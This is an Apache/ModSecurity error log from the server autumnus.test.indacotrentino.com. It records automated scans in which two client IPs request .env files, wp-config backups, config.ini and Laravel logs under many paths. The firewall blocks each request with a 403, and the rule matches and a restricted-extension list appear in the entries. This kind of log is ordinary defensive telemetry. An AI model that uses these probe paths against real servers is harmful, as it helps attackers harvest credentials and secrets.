[Wed Feb 19 05:54:20.811478 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:432/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxBAAAAAM"]
[Wed Feb 19 05:54:20.841493 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /:8000/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:8000/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxBQAAAAM"]
[Wed Feb 19 05:54:20.841761 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:8000/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxBQAAAAM"]
[Wed Feb 19 05:54:20.842109 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:8000/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxBQAAAAM"]
[Wed Feb 19 05:54:20.876671 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /:8080/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:8080/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxBgAAAAM"]
[Wed Feb 19 05:54:20.877027 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:8080/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxBgAAAAM"]
[Wed Feb 19 05:54:20.877477 2025] [:error] [pid 1258388] [client 193.41.206.98:34340] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/:8080/.env"] [unique_id "Z7Vj_AzqEFiMFYV11ByxBgAAAAM"]
[Wed Feb 19 05:55:18.352459 2025] [:error] [pid 1259335] [client 193.41.206.98:37368] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php-backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php-backup"] [unique_id "Z7VkNoC8jifnO0kJgZgwNwAAAAk"]
[Wed Feb 19 05:55:18.354119 2025] [:error] [pid 1259335] [client 193.41.206.98:37368] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php-backup"] [unique_id "Z7VkNoC8jifnO0kJgZgwNwAAAAk"]
[Wed Feb 19 05:55:18.354699 2025] [:error] [pid 1259335] [client 193.41.206.98:37368] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php-backup"] [unique_id "Z7VkNoC8jifnO0kJgZgwNwAAAAk"]
[Wed Feb 19 05:55:18.379910 2025] [:error] [pid 1259335] [client 193.41.206.98:37368] [client 193.41.206.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config.ini"] [unique_id "Z7VkNoC8jifnO0kJgZgwOAAAAAk"]
[Wed Feb 19 05:55:18.380446 2025] [:error] [pid 1259335] [client 193.41.206.98:37368] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config.ini"] [unique_id "Z7VkNoC8jifnO0kJgZgwOAAAAAk"]
[Wed Feb 19 05:55:18.380946 2025] [:error] [pid 1259335] [client 193.41.206.98:37368] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config.ini"] [unique_id "Z7VkNoC8jifnO0kJgZgwOAAAAAk"]
[Wed Feb 19 05:55:28.761860 2025] [:error] [pid 1258385] [client 193.41.206.98:37940] [client 193.41.206.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "Z7VkQJMb97vBIjpxehUPKgAAAAA"]
[Wed Feb 19 05:55:28.763297 2025] [:error] [pid 1258385] [client 193.41.206.98:37940] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "Z7VkQJMb97vBIjpxehUPKgAAAAA"]
[Wed Feb 19 05:55:28.763563 2025] [:error] [pid 1258385] [client 193.41.206.98:37940] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "Z7VkQJMb97vBIjpxehUPKgAAAAA"]
[Wed Feb 19 05:55:28.786981 2025] [:error] [pid 1258385] [client 193.41.206.98:37940] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lara/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/Lara/.env"] [unique_id "Z7VkQJMb97vBIjpxehUPKwAAAAA"]
[Wed Feb 19 05:55:28.787367 2025] [:error] [pid 1258385] [client 193.41.206.98:37940] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/Lara/.env"] [unique_id "Z7VkQJMb97vBIjpxehUPKwAAAAA"]
[Wed Feb 19 05:55:28.787896 2025] [:error] [pid 1258385] [client 193.41.206.98:37940] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/Lara/.env"] [unique_id "Z7VkQJMb97vBIjpxehUPKwAAAAA"]
[Wed Feb 19 05:55:44.324156 2025] [:error] [pid 1259200] [client 193.41.206.98:54094] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "Z7VkUJybKOPXlKDbX1SYrQAAAAY"]
[Wed Feb 19 05:55:44.324555 2025] [:error] [pid 1259200] [client 193.41.206.98:54094] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "Z7VkUJybKOPXlKDbX1SYrQAAAAY"]
[Wed Feb 19 05:55:44.325014 2025] [:error] [pid 1259200] [client 193.41.206.98:54094] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "Z7VkUJybKOPXlKDbX1SYrQAAAAY"]
[Wed Feb 19 05:55:44.362716 2025] [authz_core:error] [pid 1259200] [client 193.41.206.98:54094] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Wed Feb 19 05:55:44.386664 2025] [:error] [pid 1259200] [client 193.41.206.98:54094] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "Z7VkUJybKOPXlKDbX1SYrwAAAAY"]
[Wed Feb 19 05:55:44.387061 2025] [:error] [pid 1259200] [client 193.41.206.98:54094] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "Z7VkUJybKOPXlKDbX1SYrwAAAAY"]
[Wed Feb 19 05:55:44.387520 2025] [:error] [pid 1259200] [client 193.41.206.98:54094] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "Z7VkUJybKOPXlKDbX1SYrwAAAAY"]
[Wed Feb 19 05:55:44.410898 2025] [:error] [pid 1259200] [client 193.41.206.98:54094] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "Z7VkUJybKOPXlKDbX1SYsAAAAAY"]
[Wed Feb 19 05:55:44.411292 2025] [:error] [pid 1259200] [client 193.41.206.98:54094] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "Z7VkUJybKOPXlKDbX1SYsAAAAAY"]
[Wed Feb 19 05:55:44.411781 2025] [:error] [pid 1259200] [client 193.41.206.98:54094] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "Z7VkUJybKOPXlKDbX1SYsAAAAAY"]
[Sat Feb 22 09:48:21.595705 2025] [:error] [pid 1324875] [client 45.148.10.166:3762] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z7mPVYXfBZocK-8lZnXd-QAAAE4"], referer: https://www.google.com/
[Sat Feb 22 09:48:21.602271 2025] [:error] [pid 1324875] [client 45.148.10.166:3762] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z7mPVYXfBZocK-8lZnXd-QAAAE4"], referer: https://www.google.com/
[Sat Feb 22 09:48:21.602627 2025] [:error] [pid 1324875] [client 45.148.10.166:3762] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z7mPVYXfBZocK-8lZnXd-QAAAE4"], referer: https://www.google.com/
[Sat Feb 22 09:48:21.782396 2025] [:error] [pid 1324874] [client 45.148.10.166:3778] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7mPVftky72f57E6I5D1OAAAAE0"], referer: https://www.google.com/
[Sat Feb 22 09:48:21.783431 2025] [:error] [pid 1324874] [client 45.148.10.166:3778] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7mPVftky72f57E6I5D1OAAAAE0"], referer: https://www.google.com/
[Sat Feb 22 09:48:21.783873 2025] [:error] [pid 1324874] [client 45.148.10.166:3778] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7mPVftky72f57E6I5D1OAAAAE0"], referer: https://www.google.com/
[Sat Feb 22 09:48:22.461260 2025] [:error] [pid 1324879] [client 45.148.10.166:3808] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7mPVnzwg1sUFvYIvKHPAAAAAFI"], referer: https://www.google.com/
[Sat Feb 22 09:48:22.462209 2025] [:error] [pid 1324879] [client 45.148.10.166:3808] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7mPVnzwg1sUFvYIvKHPAAAAAFI"], referer: https://www.google.com/
[Sat Feb 22 09:48:22.462723 2025] [:error] [pid 1324879] [client 45.148.10.166:3808] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7mPVnzwg1sUFvYIvKHPAAAAAFI"], referer: https://www.google.com/
[Sat Feb 22 09:48:22.623678 2025] [:error] [pid 1324872] [client 45.148.10.166:3822] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z7mPVvb1EHGQ3bZwEhJWqQAAAEs"], referer: https://www.google.com/
